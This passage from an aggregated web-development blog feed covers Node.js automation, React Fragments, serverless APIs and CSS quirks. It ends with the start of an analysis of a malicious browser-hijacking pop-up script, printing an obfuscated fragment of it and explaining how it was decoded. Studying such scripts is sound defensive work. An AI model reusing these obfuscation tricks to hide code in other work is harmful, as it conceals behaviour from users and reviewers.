  const hexColorRegex = /^#([A-Fa-f0-9]{6}|[A-Fa-f0-9]{3})$/;
  if (hexColorRegex.test(color)) {
    return color;
  }
  return readLineSync.question(`Enter a Hex Code for the game ${colorType} color `, {
    limit: hexColorRegex,
    limitMessage: 'Enter a valid hex code: #efefef'
  });
};

gamePrimaryColor = confirmColorInput(gamePrimaryColor, 'primary');
gameSecondaryColor = confirmColorInput(gameSecondaryColor, 'secondary');

console.log(`Creating a new reskin '${gameName}' with skin color: Primary: '${gamePrimaryColor}' Secondary: '${gameSecondaryColor}'`);

const src = path.join(__dirname, 'template');
const destination = path.join(__dirname, 'releases', gameName);
const configurationFilePath = path.join(destination, GAME_JSON_FILENAME);
const projectToOpen = path.join('http://localhost:8080', 'releases', gameName, 'index.html');

fse.copy(src, destination)
  .then(() => {
    console.log(`Successfully created ${destination}`.green);
    return fse.readJson(configurationFilePath);
  })
  .then((config) => {
    const newConfig = config;
    newConfig.primaryColor = gamePrimaryColor;
    newConfig.secondaryColor = gameSecondaryColor;
    return fse.writeJson(configurationFilePath, newConfig);
  })
  .then(() => {
    console.log(`Updated configuration file ${configurationFilePath}`.green);
    openGameIfAgreed(projectToOpen);
  })
  .catch(console.error);

const openGameIfAgreed = (fileToOpen) => {
  const isOpeningGame = readLineSync.keyInYN('Would you like to open the game? ');
  if (isOpeningGame) {
    open(fileToOpen);
  }
};

At the top of the script, we require the packages needed to carry out the process.

  • colors to be used to signify success or failure using green or red text.
  • minimist to make it easier to pass arguments to our script and parse them, so input can be supplied without being prompted.
  • path to construct paths to the template and the destination of the new game.
  • readline-sync to prompt the user for information if it's missing.
  • fs-extra so we can copy and paste our game template. An extension of the native fs module.
  • opn, a cross-platform library that will open up our game in a browser upon completion.

The majority of the modules above would’ve been downloaded/installed when you ran npm install in the root of the nobot-examples repository. The rest are native to Node.

We check if the game name was passed as an option through the command line, and if it hasn’t been, we prompt the user for it.

// name of our JSON file. We store it as a constant
const GAME_JSON_FILENAME = 'game.json';

// Retrieved from the command line --gameName='my-game' etc.
let { gameName, gamePrimaryColor, gameSecondaryColor } = argv;

// was the gameName passed?
if (gameName === undefined) {
  gameName = readLineSync.question('What is the name of the new reskin? ', {
    limit: input => input.trim().length > 0,
    limitMessage: 'The project has to have a name, try again'
  });
}

Because two of our values need to be hex codes, we create a function that can do the check for both colors: the primary and the secondary. If the color supplied by the user does not pass our validation, we prompt for the color until it does.

// Does the color passed in meet our validation requirements?
const confirmColorInput = (color, colorType = 'primary') => {
  const hexColorRegex = /^#([A-Fa-f0-9]{6}|[A-Fa-f0-9]{3})$/;
  if (hexColorRegex.test(color)) {
    return color;
  }
  return readLineSync.question(`Enter a Hex Code for the game ${colorType} color `, {
    limit: hexColorRegex,
    limitMessage: 'Enter a valid hex code: #efefef'
  });
};
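As a quick sanity check of that hex code validation, here is a tiny standalone snippet (for illustration only; it is not part of the script):

```javascript
// Same pattern as in confirmColorInput: a hash followed by
// exactly six or exactly three hex digits.
const hexColorRegex = /^#([A-Fa-f0-9]{6}|[A-Fa-f0-9]{3})$/;

console.log(hexColorRegex.test('#76cad8')); // true  - six hex digits
console.log(hexColorRegex.test('#fff'));    // true  - three-digit shorthand
console.log(hexColorRegex.test('76cad8'));  // false - missing the leading #
console.log(hexColorRegex.test('#76cad'));  // false - five digits is invalid
```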

We use the function above to obtain both the primary and secondary colors.

gamePrimaryColor = confirmColorInput(gamePrimaryColor, 'primary'); gameSecondaryColor = confirmColorInput(gameSecondaryColor, 'secondary');

In the next block of code, we are printing to standard output (console.log) to confirm the values that will be used in the process of building the game. The statements that follow are preparing the paths to the relevant files and directories.

The src will point to the template directory. The destination will point to a new directory under releases. The configuration file that will have its values updated will reside under this new game directory we are creating. And finally, to preview our new game, we construct the URL using the path to the local server we booted up earlier on.

console.log(`Creating a new reskin '${gameName}' with skin color: Primary: '${gamePrimaryColor}' Secondary: '${gameSecondaryColor}'`);

const src = path.join(__dirname, 'template');
const destination = path.join(__dirname, 'releases', gameName);
const configurationFilePath = path.join(destination, GAME_JSON_FILENAME);
const projectToOpen = path.join('http://localhost:8080', 'releases', gameName, 'index.html');

In the code following this explanation, we:

  • Copy the template files to the releases directory.
  • After this is created, we read the JSON of the original template values.
  • With the new configuration object, we override the existing primary and secondary colors provided by the user’s input.
  • We rewrite the JSON file so it has the new values.
  • When the JSON file has been updated, we ask the user if they would like to open the new game in a browser.
  • If anything went wrong, we catch the error and log it out.
fse.copy(src, destination)
  .then(() => {
    console.log(`Successfully created ${destination}`.green);
    return fse.readJson(configurationFilePath);
  })
  .then((config) => {
    const newConfig = config;
    newConfig.primaryColor = gamePrimaryColor;
    newConfig.secondaryColor = gameSecondaryColor;
    return fse.writeJson(configurationFilePath, newConfig);
  })
  .then(() => {
    console.log(`Updated configuration file ${configurationFilePath}`.green);
    openGameIfAgreed(projectToOpen);
  })
  .catch(console.error);

Below is the function that gets invoked when the copying has completed. It will then prompt the user to see if they would like to open up the game in the browser. The user responds with y or n.

const openGameIfAgreed = (fileToOpen) => {
  const isOpeningGame = readLineSync.keyInYN('Would you like to open the game? ');
  if (isOpeningGame) {
    open(fileToOpen);
  }
};

Let’s see it in action when we don’t pass any arguments. You can see it doesn’t break, and instead prompts the user for the values it needs.

$ node new-reskin.js
What is the name of the new reskin? blue-reskin
Enter a Hex Code for the game primary color #76cad8
Enter a Hex Code for the game secondary color #10496b
Creating a new reskin 'blue-reskin' with skin color: Primary: '#76cad8' Secondary: '#10496b'
Successfully created nobot-examples\examples\020\releases\blue-reskin
Updated configuration file nobot-examples\examples\020\releases\blue-reskin\game.json
Would you like to open the game? [y/n]: y
(opens game in browser)

My game opens on my localhost server automatically and the game commences, with the new colors. Sweet!

Oh... I’ve lost a life already. Now if you navigate to the releases directory, you will see a new directory called blue-reskin. This contains the values in the JSON file we entered during the script execution.

Below are a few more releases I made by running the same command. You can imagine if you were releasing games that could configure different images, sounds, labels, content and fonts, you would have a rich library of games based on the same mechanics.
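As an example of where this could go, a richer template configuration might look something like the following (the extra fields here are hypothetical; the demo game only reads the two colors):

```json
{
  "primaryColor": "#76cad8",
  "secondaryColor": "#10496b",
  "title": "Blue Breakout",
  "font": "sans-serif",
  "sounds": {
    "brickHit": "assets/sounds/hit.mp3"
  },
  "images": {
    "background": "assets/images/bg.png"
  }
}
```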

Even better, if the stakeholders and designers had all of this information in a Jira ticket, you could integrate the Jira API into the Node script to inject these values in without the user having to provide any input. Winning!

This is one of many examples that can be found in Automating with Node.js. In this book, we will be looking at a more advanced example using "Rock Paper Scissors" as the basis of a build tool created from scratch.

The post Automate Your Workflow with Node appeared first on CSS-Tricks.

CSS-in-JS: FTW || WTF?

Css Tricks - Tue, 07/17/2018 - 10:39am

I enjoyed Bruce Lawson's talk on this holiest of wars. It's funny and lighthearted while being well researched and fairly portraying the good arguments on both sides.

The post CSS-in-JS: FTW || WTF? appeared first on CSS-Tricks.

Render Children in React Using Fragment or Array Components

Css Tricks - Tue, 07/17/2018 - 3:38am

What comes to your mind when React 16 comes up? Context? Error Boundary? Those are on point. React 16 came with those goodies and much more, but in this post, we'll be looking at the rendering power it also introduced — namely, the ability to render children using Fragments and Array Components.

These are new and really exciting concepts that came out of the React 16 release, so let’s look at them closer and get to know them.


It used to be that React components could only return a single element. If you have ever tried to return more than one element, you know that you’ll be greeted with this error: Syntax error: Adjacent JSX elements must be wrapped in an enclosing tag. The way out of that is to make use of a wrapper div or span element that acts as the enclosing tag.

So instead of doing this:

class Countries extends React.Component {
  render() {
    return (
      <li>Canada</li>
      <li>Australia</li>
      <li>Norway</li>
      <li>Mexico</li>
    )
  }
}

...you have to add either an ol or ul tag as a wrapper on those list items:

class Countries extends React.Component {
  render() {
    return (
      <ul>
        <li>Canada</li>
        <li>Australia</li>
        <li>Norway</li>
        <li>Mexico</li>
      </ul>
    )
  }
}

Most times, this may not be the initial design you had for the application, but you are left with no choice but to compromise on this ground.

React 16 solves this with Fragments. This new feature allows you to wrap a list of children without adding an extra node. So, instead of adding an additional element as a wrapper like we did in the last example, we can throw <React.Fragment> in there to do the job:

class Countries extends React.Component {
  render() {
    return (
      <React.Fragment>
        <li>Canada</li>
        <li>Australia</li>
        <li>Norway</li>
        <li>Mexico</li>
      </React.Fragment>
    )
  }
}

You may think that doesn’t make much difference. But, imagine a situation where you have a component that lists different items such as fruits and other things. These items are all components, and if you are making use of old React versions, the items in these individual components will have to be wrapped in an enclosing tag. Now, however, you can make use of fragments and do away with that unnecessary markup.

Here’s a sample of what I mean:

class Items extends React.Component {
  render() {
    return (
      <React.Fragment>
        <Fruit />
        <Beverages />
        <Drinks />
      </React.Fragment>
    )
  }
}

We have three child components inside of the fragment and can now create a component for the container that wraps it. This is much more in line with being able to create components out of everything and being able to compile code with less cruft.

Fragment Shorthand

There is a shorthand syntax you can use when working with Fragments. Staying true to its fragment nature, the syntax is like a fragment itself, leaving only empty brackets behind.

Going back to our last example:

class Fruit extends React.Component {
  render() {
    return (
      <>
        <li>Apple</li>
        <li>Orange</li>
        <li>Blueberry</li>
        <li>Cherry</li>
      </>
    )
  }
}

Question: Is a fragment better than a container div?

You may be looking for a good reason to use Fragments instead of the container div you have always been using. Dan Abramov answered the question on Stack Overflow. To summarize:

  1. It’s a tiny bit faster and has less memory usage (no need to create an extra DOM node). This only has a real benefit on very large and/or deep trees, but application performance often suffers from death by a thousand cuts. This is one less cut.
  2. Some CSS mechanisms like flexbox and grid have a special parent-child relationship, and adding divs in the middle makes it harder to maintain the design while extracting logical components.
  3. The DOM inspector is less cluttered.
Keys in Fragments

When mapping a list of items, you still need to make use of keys the same way as before. For example, let's say we want to pass a list of items as props from a parent component to a child component. In the child component, we want to map through the list of items we have and output each item as a separate entity. Here’s how that looks:

const preload = {
  "data": [
    {
      "id": 1,
      "name": "Reactjs",
      "url": "https://reactjs.org",
      "description": "A JavaScript library for building user interfaces"
    },
    {
      "id": 2,
      "name": "Vuejs",
      "url": "https://vuejs.org",
      "description": "The Progressive JavaScript Framework"
    },
    {
      "id": 3,
      "name": "Emberjs",
      "url": "https://www.emberjs.com",
      "description": "Ember.js is an open-source JavaScript web framework, based on the Model–view–viewmodel pattern"
    }
  ]
}

const Frameworks = (props) => {
  return (
    <React.Fragment>
      {props.items.data.map(item => (
        <React.Fragment key={item.id}>
          <h2>{item.name}</h2>
          <p>{item.url}</p>
          <p>{item.description}</p>
        </React.Fragment>
      ))}
    </React.Fragment>
  )
}

const App = () => {
  return (
    <Frameworks items={preload} />
  )
}

See the Pen React Fragment Pen by Kingsley Silas Chijioke (@kinsomicrote) on CodePen.

You can see that now, in this case, we are not making use of any divs in the Frameworks component. That’s the key difference!

Render Children Using an Array of Components

The second specific thing that came out of React 16 we want to look at is the ability to render multiple children using an array of components. This is a clear timesaver because it allows us to return as many elements as we need in a single render instead of having to wrap them one-by-one.

Here is an example:

class Frameworks extends React.Component {
  render () {
    return (
      [
        <p>JavaScript:</p>,
        <li>React</li>,
        <li>Vuejs</li>,
        <li>Angular</li>
      ]
    )
  }
}

You can also do the same with a stateless functional component:

const Frontend = () => {
  return [
    <h3>Front-End:</h3>,
    <li>Reactjs</li>,
    <li>Vuejs</li>
  ]
}

const Backend = () => {
  return [
    <h3>Back-End:</h3>,
    <li>Express</li>,
    <li>Restify</li>
  ]
}

const App = () => {
  return [
    <h2>JavaScript Tools</h2>,
    <Frontend />,
    <Backend />
  ]
}

See the Pen React Fragment 2 Pen by Kingsley Silas Chijioke (@kinsomicrote) on CodePen.


Like the Context API and Error Boundary features that were introduced in React 16, rendering children with Fragments and rendering multiple children with Array Components are two more awesome features you can start making use of as you build your application.

Have you started using these in a project? Let me know how in the comments so we can compare notes. 🙂

The post Render Children in React Using Fragment or Array Components appeared first on CSS-Tricks.

PSA: Yes, Serverless Still Involves Servers.

Css Tricks - Mon, 07/16/2018 - 10:00am

You clever dog. You've rooted it out! It turns out when you build things with serverless technology you're still using servers. Pardon the patronizing tone there; I've seen one too many hot takes at this point where someone points this fact out and trots away triumphantly.

And yes, because serverless still involves servers, the term might be a bit disingenuous to some. You could be forgiven for thinking that serverless meant technologies like web workers, which use the client to do things you might otherwise have done on a server, and that this is where the term serverless was headed. Alas, it is not.

What serverless really means:

  • Using other people's servers instead of running your own. You're probably already doing that, but serverless takes it to another level where you have no control over the server outside of telling it to run a bit of code.
  • You don't need to think about scaling — that's the serverless provider's problem.
  • You are only paying per execution of your code and not some fixed cost per time.
  • You only worry about your code being misused, but not the security of the server itself.
  • We're mostly talking about Cloud Functions above, but I'd argue the serverless movement involves anything that allows you to work from static hosting and leverage services to help you with functionality. For example, even putting a Google Form on a static site is within the serverless spirit.

Serverless is about outsourcing a little bit more of your project to companies that are incentivized to do it well. My hope is that someday we can have a conversation about serverless without having to tread this ground and squabble about the term every time. I suspect we will. I think we're almost over the term "the cloud" as an industry, and we'll jump this hurdle too. It's worth it when a single word successfully evokes a whole ecosystem.

Wanna know more about serverless? Here's the tag on CSS-Tricks where we've talked about it a bunch.

The post PSA: Yes, Serverless Still Involves Servers. appeared first on CSS-Tricks.

Create your own Serverless API

Css Tricks - Mon, 07/16/2018 - 3:55am

If you don’t already know of it, Todd Motto has this great list of public APIs. It’s awesome if you’re trying out a new framework or new layout pattern and want to hit the ground running without fussing with the content.

But what if you want or need to make your own API? Serverless can help create a nice one for data you’d like to expose for use.

Serverless really shines for this use case, and hopefully this post makes it clear why. In a non-serverless paradigm, we have to pick something like Express, we have to set up endpoints, we have to give our web server secure access to our database server, we have to deploy it, etc. In contrast, here we'll be able to create an API in a few button clicks, with minor modifications.

Here’s the inspiration for this tutorial: I've been building a finder to search for new cocktails and grab a random one. I originally started using a public API but quickly found the contents limiting and wanted to shape my own.


I’m going to use Azure for these examples but it is possible to accomplish what we're doing here with other cloud providers as well.

Make the Function

To get started, if you haven't already, create a free Azure trial account. Then go to the portal: preview.portal.azure.com.

Next, we'll hit the plus sign at the top left and select Serverless Function App from the list. We can then fill in the new name of our function and some options. It will pick up our resource group, subscription, and create a storage account from defaults. It will also use the location data from the resource group. So, happily, it's pretty easy to populate the data.

Next, we'll create a new function using HTTP Trigger, and go to the Integrate tab to perform some actions:


What we did was:

  • Give the route template a name
  • Change the authorization level to "Anonymous"
  • Change the allowed HTTP methods to "Selected Method"
  • Select "GET" for the selected method and unchecked everything else

Now, if we get the function URL from the top right of our function, we'll get this:


The initial boilerplate testing code that we're given is:

module.exports = function (context, req) {
  context.log('JavaScript HTTP trigger function processed a request.');

  if (req.query.name || (req.body && req.body.name)) {
    context.res = {
      // status: 200, /* Defaults to 200 */
      body: "Hello " + (req.query.name || req.body.name)
    };
  } else {
    context.res = {
      status: 400,
      body: "Please pass a name on the query string or in the request body"
    };
  }
  context.done();
};

Now if we go to the URL below, we’ll see this:


There’s more information in this blog post, including API unification with Function Proxies. You can also use custom domains, not covered here.

OK, now that that initial part is all set up, let’s find a place to host our data.

Storing the data with CosmosDB

There are a number of ways to store the data for our function. I wanted to use Cosmos because it has one-click integration, making for a pretty low-friction choice. Get a free account here. Once you're in the portal, we'll go to the plus sign in the top left to create a new service and this time select "CosmosDB." In this case, we chose the SQL version.

We have a few options for how to create our documents in the database. We're merely making a small example for demo purposes, so we can manually create them by going to Data Explorer in the sidebar. In there, I made a database called CocktailFinder, a collection called Cocktails, and added each document. For our Partition Key, we'll use /id.

In real practice, you’d probably either want to upload a JSON file by clicking the "Upload JSON" button or follow this article for how to create the files with the CLI.

We can add something in JSON format like this:

{
  "id": "1",
  "drink": "gin_and_tonic",
  "ingredients": [
    "2 ounces gin",
    "2 lime wedges",
    "3–4 ounces tonic water"
  ],
  "directions": "Add gin to a highball glass filled with ice. Squeeze in lime wedges to taste, then add them to glass. Add tonic water; stir to combine.",
  "glass": [
    "highball",
    "hurricane"
  ],
  "image": "https://images.unsplash.com/photo-1523905491727-d82018a34d75?ixlib=rb-0.3.5&ixid=eyJhcHBfaWQiOjEyMDd9&s=52731e6d008be93fda7f5af1145eac12&auto=format&fit=crop&w=750&q=80"
}

And here is the example with all three that we’ve created, and what Cosmos adds in:


Have the function surface the data

OK, now we’ve got some dummy data to work with, so let’s connect it to our serverless function so we can finish up our API!

If we go back to our function in the portal and click Integrate in the sidebar again, there’s a middle column called Inputs. Here, we can click on the plus that says "+ New Inputs" and a few options come up. We’ll click the CosmosDB option and "Create."

A prompt will come up that asks us to provide information about our Database and Collection. If you recall, the databaseName was CocktailFinder and the collectionName was Cocktails. We also want to use the same partitionKey which was /id. We’ll use all the other defaults.

Now if we go to our function.json, you can see that it’s now been updated with:

{
  "type": "documentDB",
  "name": "inputDocument",
  "databaseName": "CocktailFinder",
  "collectionName": "Cocktails",
  "partitionKey": "/id",
  "connection": "sdrassample_DOCUMENTDB",
  "direction": "in"
}

We’re going to use that inputDocument to update our testing function to reflect what we’re trying to access. I also add in the status and log frequently, but that’s optional.

module.exports = function (context, req) {
  context.log('JavaScript HTTP trigger function processed a request.');

  if (context.bindings) {
    context.log('Get ready');
    context.res = { status: 200, body: context.bindings.inputDocument };
    context.log(context.res);
  } else {
    context.res = {
      status: 400,
      body: "Something went wrong"
    };
  }
  context.done();
};

Now you can see our function at work!



Can’t forget the CORS. Back in the portal, we’ll click on the function name and click on Platform Features. CORS is listed under the API heading.

We can add any of the allowed origins here. Remember, this includes localhost.

Serve it up!

Now, to make sure the API is working and we can access its data from an application, we’ll use an axios call. I have a really barebones CodePen implementation so that you can see how that might work. In Vue, we’re hooking into the created lifecycle method and making the GET request in order to output the JSON data to the page.

See the Pen Show API Output, beginning of Vue.js integration by Sarah Drasner (@sdras) on CodePen.

From here, you have all that data to play with, and you can store whatever you like in whatever form you fancy. You can use something like Vue, React, or Angular to create interfaces with the content we stored in our database, and our serverless function creates the API for us. The sky is the limit to what we can create! 🎉

The post Create your own Serverless API appeared first on CSS-Tricks.

Remote Conferences; Bridging the Gap, Clearing the Odds

Css Tricks - Mon, 07/16/2018 - 2:31am

A few weeks back, I saw one of my esteemed mentors decry the psychological traumas he had experienced, following series after series of refusals at certain embassies.

“A child concentrating hard at school” by Les Anderson on Unsplash

You would think he went for a contract he did not have the capacity for, but then, you would have been wrong. He needed to impart knowledge. He opted to do so across borders, but then, some realities were harsh.

We are fighting just the police for mistaking techies and related careers as fraudsters when we have a much bigger problem #thread

— Christian Nwamba (@codebeast) June 3, 2018

Borders and geographical constraints can cause a lot of havoc. However, they can only do so when a better way to impart knowledge across borders has yet to be discovered. Video conferencing technology has become handy at times like this. Hence, your traditional seminars, conferences, and talks can easily be held from anywhere, regardless of your role.

Photo by DESIGNECOLOGIST on Unsplash
On a lighter note, these pillows are dope.

Maybe we should not be too ambitious. Maybe we could simply make this article about a one-sided ‘remoteness’, where the attendees are gathered at an offline venue, but the speakers have 100% flexibility to speak from anywhere.

For this kind of arrangement, there are many advantages, as well as some disadvantages. Let's start with the disadvantages: in a place without very fast internet, the video and audio quality might be abysmal. But that is about it!

For the advantages: a herd of developers or writers is gathered, waiting for a speaker to impart knowledge. So many things could have gone wrong if the speaker had to travel from one location to another. Think about the racism, the mishaps or the thefts. What about the man-hours lost commuting from one place to the other?

All of these are greatly minimized to a lazy trudge from your bed or kitchen to your computer. Then, with 5 minutes to the conference, the speaker is washing their face and checking their teeth. Now they are out of time and rush in wearing a neatly ironed shirt over light brown underpants. Of course, the camera is only built to see the face of the speaker. Convenience is the word!

Visa problems are a thing here in Africa. While a public ban has not been placed on some countries, a lot of resource persons find it difficult to get a visa to speak in countries where they have a large following, or not.

Photo by Bruno Aguirre on Unsplash

However, this conferencing arrangement might make your dream come true, if and only if you are able to get up from that cozy bed and turn on your computer in time. You could reach a wider audience than you expect.

Such an easy life.

For the attendees, it is a win. Look at it this way: your favorite speakers are just a click away from you! That sounds alluring. There are plenty of reasons why your favorite speakers might not make it to a totally offline conference, but now everything has been simplified and they are simply a button and a good internet connection away. This offers more mentorship chances and enhances progress. In sum, it makes things easier for your favorite speakers.

Photo by Headway on Unsplash

Are you a writer, a developer or a random conference crasher? Then you should look out for the next online conference in town. You might just be surprised at the quality of speakers you would be hearing from.

Concatenate is a free conference for Nigerian developers, happening the 9th and 10th of August. The attendees will be in person and the speakers and MC will be both in person and remote from around the world. If you're near Lagos, register here!

The post Remote Conferences; Bridging the Gap, Clearing the Odds appeared first on CSS-Tricks.

The div that looks different in every browser

Css Tricks - Fri, 07/13/2018 - 11:14am

It's not that Martijn Cuppens used User Agent sniffing, CSS hacks, or anything like that to make this quirky div. This is just a plain ol' <div> using the outline property a la:

div {
  outline: inset 100px green;
  outline-offset: -125px;
}

It looks different in different browsers because browsers literally render something differently in this strange situation.

I happened upon Reddit user spidermonk33's comment in which they animated the offset to understand it a bit more. I took that idea and made this little video to show them behaving even weirder than the snapshots...

Direct Link to ArticlePermalink

The post The div that looks different in every browser appeared first on CSS-Tricks.

Scrolling Gradient

Css Tricks - Fri, 07/13/2018 - 11:13am

If you want a gradient that changes as you scroll down a very long page, you can create a gradient with a bunch of color stops, apply it to the body and it will do just that.

But, what if you don't want a perfectly vertical gradient? Like you want just the top left corner to change color? Mike Riethmuller, re-using his own technique from the CSS-only scroll indicator (A-grade CSS trickery), did this by overlapping two gradients. The "top" one is fixed position and sort of leaves a hole that another taller gradient peeks through from below on scroll.

Direct Link to ArticlePermalink

The post Scrolling Gradient appeared first on CSS-Tricks.

Anatomy of a malicious script: how a website can take over your browser

Css Tricks - Fri, 07/13/2018 - 3:52am

By now, we all know that the major tech behemoths like Facebook or Google know everything about our lives, including how often we go to the bathroom (hence all the prostate medication ads that keep popping up, even on reputable news sites). After all, we’ve given them permission to do so, by reading pages and pages of legalese in their T&C pages (we all did, didn’t we?) and clicking on the "Accept" button.

But what can a site do to you, or to your device, without your explicit consent? What happens when you visit a slightly "improper" site, or a "proper" site you visited includes some third-party script that hasn’t been thoroughly checked?

Has it ever happened to you that your browser gets hijacked and innumerable pop-ups come up, and you seem to be unable to close them without quitting the browser altogether, or clicking 25 times on the "Back" button? You do feel in danger when that happens, don’t you?

Following input from Chris here at CSS-Tricks, I decided to look for a script that does exactly that, and see what happens under the hood. It looked like a fairly daunting task, but I’ve learned quite a few things from it, and in the end had a lot of fun doing it. I hope I can share some of the fun with you.

The hunt for the script

The idea was to look for, to quote Chris, "bits of JavaScript that do surprisingly scary things."

The first thing I did was to set up a virtual machine with VirtualBox on my main Ubuntu development PC. This way, if the sites I visited and the scripts contained therein tried to do something scary to my computer, I would just need to erase the VM without compromising my precious laptop. I installed the latest version of Ubuntu on the VM, opened the browser and went hunting.

One of the things I was looking for was uses of a variation of the infamous Evercookie (aka "undeletable cookie") which would be a clear sign of shady tracking techniques.

Where to look for such a script? I tried to find one of the aforementioned intrusive ads on legitimate websites, but couldn’t find any. It seems that companies supplying ads have become much better at spotting suspicious scripts, presumably by automating the vetting process.

I tried some reputable news sites, to see if there was anything interesting, but all I found were tons and tons of standard tracking scripts (and JavaScript errors in the console logs). In these cases, most of what the scripts do is send data to a server, and since you have little way of knowing what the server’s actually doing with the data, it would have been very difficult to dissect them.

I then thought that the best place to look for "scary" stuff would be sites whose owners won’t risk a legal action if they do something "scary" to their users. Which means, basically, sites where the user is trying to do something bordering on the illegal to begin with.

I looked at some Pirate Bay proxies, with no luck. Then I decided to move over to sites offering links to illegal streaming of sporting events. I went through a couple of sites, looking carefully at the scripts they included with Chromium’s DevTools.

On a site offering, amongst others, illegal streaming of table tennis matches, I noticed (in the list of JavaScript files in the DevTools Network tab), amongst third-party libraries, standard UI scripts and the all-too-frequent duplicate inclusion of the Google Analytics library (ouch!), a strangely named script with no .js extension and just a number as a URL.

Our suspect, spotted in the Network tab.

I had a look at the seemingly endless lines of obfuscated code that constituted most of the script, and found strings like chromePDFPopunderNew, adblockPopup, flashFileUrl, escaped <script> tags, and even a string containing an inline PDF. This looked like interesting stuff. The hunt was over! I downloaded the script to my computer, and started trying to make some sense of it.

I am not explicitly disclosing the domains involved in this operation, since we’re interested in the sin here, not the sinner. However, I’ve deliberately left a way of determining at least the main URL the script is sending users to. If you manage to solve the riddle, send me a private message, and I’ll tell you if you guessed right!

The script: deobfuscating and figuring out the configuration parameters What the script looks like

The script is obfuscated, both for security purposes and to ensure a faster download. It is made of a big IIFE (Immediately-invoked function expression), which is a technique used to isolate a piece of JavaScript code from its surroundings. Context doesn’t get mixed up with other scripts, and there is no risk of namespace conflict between function or variable names in different scripts.
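As a minimal sketch of the pattern (the names here are illustrative, but they mirror the script's one real global side effect, the zfgloadedpopup flag): nothing declared inside the IIFE leaks into the enclosing scope except what it deliberately writes there.

```javascript
// A global flag, the only thing the IIFE touches outside itself
var zfgloadedpopup = false;

(function (options, lary) {
  // Everything in here is private to the IIFE
  var secretState = { popupsOpened: 0 }; // invisible outside
  zfgloadedpopup = true;                 // the one deliberate side effect
})('encrypted-options-string', 'cipher-alphabet-string');

// At this point zfgloadedpopup is true, but secretState is unreachable
```

This is why two scripts obfuscated this way can share a page without their internal one-letter variable names colliding.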

Here’s the beginning of the script. Note the beginning of the base64-encoded PDF on the last line:

And here’s the end of it:

The only action carried out in the global context, apparently, is to set the global variable zfgloadedpopup to true, presumably to tell other scripts belonging to the same "family" that this one has already been loaded. This variable is used only once, so the script itself does not check whether it has already been loaded. So, if the site you’re visiting includes it twice by mistake, you’ll get double the pop-ups at the same price. Lucky!

The big IIFE expects two parameters, called options and lary. I actually checked the name of the second parameter to see what it might mean, and the only meaning I found was "aggressive, antisocial" in British slang. "So, we’re being aggressive here," I thought. "Interesting."

The options parameter is clearly an object with keys and values, even though they’re totally unintelligible. The lary parameter is a string of some sort. To make sense of this, the only option was to deobfuscate the whole script. Keep reading, and everything will be explained.

Deobfuscating the script

I first tried to resort to existing tools, but none of the online tools available seemed to be doing what I expected them to do. Most of what they did was pretty-printing the code, which my IDE can do quite easily by itself. I read about JSDetox, which is actual computer software and should be very helpful to debug this kind of script. However, I tried to install it into two different versions of Ubuntu and ended up in Ruby GEM dependency hell in both cases. JSDetox is fairly old, and I guess it’s practically abandonware now. The only option left was to go through things mostly by hand or via manual or semi-automated Regular Expression substitutions. I had to go through several steps to fully decipher the script.

Here is an animated GIF showing the same code section at various stages of deciphering:

The transformation from unreadable gibberish to intelligible code.

The first step was quite straightforward: it required reformatting the code of the script, to add spacing and line breaks. I was left with properly indented code, but it was still full of very unreadable stuff, like the following:

var w6D0 = window;
for (var Z0 in w6D0) {
  if (Z0.length === ((129.70E1, 0x1D2) < 1.237E3 ? (47, 9) : (0x1CE, 1.025E3) < (3.570E2, 122.) ? (12.9E1, true) : (5E0, 99.) > 0x247 ? true : (120.7E1, 0x190))
      && Z0.charCodeAt((0x19D > (0x199, 1.5E1) ? (88., 6) : (57., 0x1D9))) === (121.30E1 > (1.23E2, 42) ? (45.2E1, 116) : (129., 85) > (87., 5.7E2) ? (45.1E1, 0x4) : (103., 0x146) >= (0x17D, 6.19E2) ? (1.244E3, 80) : (1.295E3, 149.))
      && Z0.charCodeAt(((1.217E3, 90.10E1) <= (0xC2, 128.) ? (66, 'sw') : (0x25, 0xAB) > 1.26E2 ? (134, 8) : (2.59E2, 0x12) > 0xA9 ? 'sw' : (0x202, 0x20F))) === ((95, 15) <= 63 ? (0x10B, 114) : (0xBB, 8.72E2) <= (62, 51.) ? 'r' : (25, 70.) >= (110.4E1, 0x8D) ? (121, 72) : (42, 11))
      && Z0.charCodeAt(((96.80E1, 4.7E1) >= 62. ? (25.70E1, 46) : 0x13D < (1.73E2, 133.1E1) ? (0x1A4, 4) : (28, 0x1EE) <= 36.30E1 ? 37 : (14.61E2, 0x152))) === (81. > (0x1FA, 34) ? (146, 103) : (0x8A, 61))
      && Z0.charCodeAt(((92.60E1, 137.6E1) > (0x8, 0x3F) ? (123., 0) : (1.41E2, 12.11E2))) === ((0xA, 0x80) > (19, 2.17E2) ? '' : (52, 0x140) > (80., 0x8E) ? (42, 110) : 83.2E1 <= (0x69, 0x166) ? (41., 'G') : (6.57E2, 1.093E3))) break
};

What is this code doing? The only solution was to try and execute the code in a console and see what happened. As it turns out, this code loops through all of window’s properties and breaks out of the loop when that very complicated condition makes a match. The end result is sort of funny because all the code above does is the following:

var Z0 = 'navigator'

…that is, saving the navigator property of window to a variable called Z0. This is indeed a lot of effort just to assign a variable! There were several variables obfuscated like this, and after a few rounds of execution in the console, I managed to obtain the following global variables:

var Z0 = 'navigator';
var Q0 = 'history';
var h0 = 'window'; // see comment below

/* Window has already been declared as w6D0. This is used to call
   the Window object of a variable containing a reference to a
   different window, other than the current one */
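Why does such a baroque condition simply pick out 'navigator'? JavaScript's comma operator returns its last operand, so every parenthesized pair collapses to a single value. Here is a runnable sketch of the trick, with a small stand-in object since window isn't available outside a browser:

```javascript
// Stand-in for `window`; only the key names matter here
const w6D0 = { location: 0, navigator: 1, history: 2 };

// The comma operator returns its last operand, so this monster is just 9:
// (0x1D2 = 466) < 1237 is true, and (47, 9) evaluates to 9
const targetLength = (129.70E1, 0x1D2) < 1.237E3 ? (47, 9) : (0x1CE, 1.025E3);

// De-sugared, the loop simply finds the property whose name has the
// right length and the right character at a probe position
let Z0;
for (const key in w6D0) {
  if (key.length === targetLength && key.charCodeAt(6) === 116 /* 't' */) {
    Z0 = key; // 'navigator'
    break;
  }
}
```

The real script probes several character positions the same way, but each check reduces to a plain number exactly like targetLength does.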

The same could be applied to several other global variables declared at the beginning of the script. This whole shenanigan seemed a bit silly to me, since many other variables in the script are declared more openly a few lines later, like these:

var m7W = {'K2': 'documentElement', 'W0': 'navigator', 'A2': 'userAgent', 'o2': 'document'};

But never mind. After this procedure, I was left with a series of variables that are global to the script and are used all over it.

Time for some mass substitutions. I substituted the w6D0 variable with window everywhere, then proceeded with the other global variables.

